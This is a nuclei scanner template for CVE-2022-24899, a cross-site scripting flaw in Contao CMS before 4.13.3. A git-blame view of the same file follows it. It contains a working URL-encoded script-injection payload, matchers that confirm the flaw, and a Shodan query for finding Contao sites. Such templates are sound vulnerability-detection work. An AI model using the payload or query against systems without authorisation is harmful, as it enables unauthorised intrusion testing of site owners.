nuclei-templates/cves/2022/CVE-2022-24899.yaml

id: CVE-2022-24899

info:
  name: Contao 4.13.2 - Cross-Site Scripting (XSS)
  author: ritikchaddha
  severity: high
  description: |
    Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
  reference:
    - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
    - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24899
  metadata:
    shodan-query: title:"Contao"
  tags: cve,cve2022,contao,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'
          - '"Not authenticated"'
        condition: and

      - type: word
        part: header
        words:
          - text/html
Create CVE-2022-24899.yaml 2022-06-18 18:50:43 +00:00			`id: CVE-2022-24899`

			`info:`
			`name: Contao 4.13.2 - Cross-Site Scripting (XSS)`
			`author: ritikchaddha`
			`severity: high`
			`description: \|`
			`Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.`
			`reference:`
			`- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/`
			`- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-24899`
			`metadata:`
			`shodan-query: title:"Contao"`
			`tags: cve,cve2022,contao,xss`

			`requests:`
			`- method: GET`
			`path:`
Update CVE-2022-24899.yaml 2022-06-22 06:34:17 +00:00			`- "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"`
Create CVE-2022-24899.yaml 2022-06-18 18:50:43 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2022-24899.yaml 2022-06-22 06:34:17 +00:00			`- '"></script><script>alert(document.domain)</script>'`
Update CVE-2022-24899.yaml 2022-06-22 06:31:46 +00:00			`- '"Not authenticated"'`
			`condition: and`
Create CVE-2022-24899.yaml 2022-06-18 18:50:43 +00:00
			`- type: word`
			`part: header`
			`words:`
Update CVE-2022-24899.yaml 2022-06-22 06:31:46 +00:00			`- text/html`